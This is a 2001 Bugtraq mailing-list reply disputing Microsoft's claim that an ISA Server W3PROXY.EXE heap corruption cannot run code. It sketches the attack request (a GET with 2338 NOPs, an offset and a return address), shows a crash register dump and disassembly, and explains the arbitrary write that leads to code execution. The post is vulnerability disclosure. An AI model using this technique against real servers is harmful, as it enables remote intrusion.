[20500] in bugtraq
Re: Microsoft ISA Server Vulnerability
daemon@ATHENA.MIT.EDU (dark spyrit)
Sat Apr 28 13:20:40 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <000b01c0cf7c$f197ddd0$020aa8c0@ns1.beavuhlabz>
Date: Sat, 28 Apr 2001 12:48:10 +1200
Reply-To: dark spyrit <dspyrit@BEAVUH.ORG>
From: dark spyrit <dspyrit@BEAVUH.ORG>
X-To: Microsoft Security Response Center <secure@MICROSOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This was tested with the standard edition available on the Microsoft site..
Details -
04/27/2001 01:56a 369,936 W3PROXY.EXE
Request - GET http://host/<2338 x nop><offset to user buffer><stored ret
address>
We found we needed to send this request twice to reach the code location
where we are able to execute our buffer.. the heap corruption can lead to
random crash locations - but we hit this point more often than not - the
fact is, it is possible.
EAX=41414141 EBX=02492394 ECX=78787878 EDX=0105B9F8 ESI=0105B9F8
EDI=024A25F0 EBP=0621FE1C ESP=0621FDF8 EIP=0101D72F o d I s z A p c
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000 ds:41414141=FFFFFFFF
001b:0101d72f mov [eax], ecx
001b:0101d731 mov [ecx+04], eax
001b:0101d734 call [ntdll!RtlLeaveCriticalSection]
001b:0101d73a mov eax, edi
001b:0101d73c pop edi
001b:0101d73d pop esi
001b:0101d73e ret
(PASSIVE)-KTEB(854083E0)-TID(05C4)--W3PROXY!.text+0001C741----------
As you can see we are able to define the values of ecx and eax... we can
write whatever data we want to a location of our choosing.
By overwriting eax with a saved return address and ecx with the address of
our buffer we can execute our code.
We had a couple of inventive ways of getting the needed stack values..
overwriting string locations with the data and having the product output the
values was one. A few possibilities.
Am I done?
dark spyrit.
----- Original Message -----
From: "Microsoft Security Response Center" <secure@MICROSOFT.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, April 28, 2001 2:54 AM
Subject: Re: Microsoft ISA Server Vulnerability
Hi -
You're right that the root problem here is a heap corruption. The
Knowledge Base article we published on the subject
(http://support.microsoft.com/support/kb/articles/q295/2/79.asp,
"Cause") notes that this is the case. As part of our investigation, we
examined whether the heap corruption could, in this case, be exploited
to run code, but we were unable to find any way to do so. If you can
demonstrate an ability to run code via the exploit, please contact us
immediately as we'd be most interested in investigating the issue
further. Regards,
Scott Culp
Security Program Manager
Microsoft Corporation
